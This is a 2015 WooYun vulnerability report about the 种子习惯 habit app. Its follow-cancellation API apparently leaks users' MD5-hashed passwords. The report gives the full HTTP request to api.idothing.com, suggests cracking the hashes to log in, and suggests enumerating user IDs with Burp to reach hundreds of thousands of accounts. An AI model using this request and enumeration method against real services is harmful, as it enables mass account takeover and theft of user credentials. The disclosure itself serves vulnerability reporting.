当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102725

漏洞标题:种子习惯app某漏洞导致用户密码泄露(目测50w+用户)

相关厂商:种子习惯APP

漏洞作者: Vern

提交时间:2015-03-24 12:44

修复时间:2015-05-08 12:46

公开时间:2015-05-08 12:46

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

正常的app功能却返回了不应该返回的信息

详细说明:

问题出在app的关注用户功能上

Screenshot_2015-03-20-21-00-04.png


抓包(只能关注一次即第一次发包,发包一次才会返回信息)

POST /zhongzi/v2.php/User/cancelFollow HTTP/1.1
Cookie: PHPSESSID=a7loj0cjqe4emeu2hjn567i0i6; path=/
Content-Length: 558
Content-Type: multipart/form-data; boundary=Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Host: api.idothing.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Content-Disposition: form-data; name="user_id"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
667521
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Content-Disposition: form-data; name="followed_user_id"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
246
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Content-Disposition: form-data; name="appid"
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit
100
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO--


1.png


2.png


返回的md5加密的密码解一下 然后登入

Screenshot_2015-03-20-21-00-04.png


漏洞证明:

用burp跑一下试试

搜狗截图20150320213509.png


user_id到60多w了 所以涉及用户不少

修复方案:

各种过滤

版权声明:转载请注明来源 Vern@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)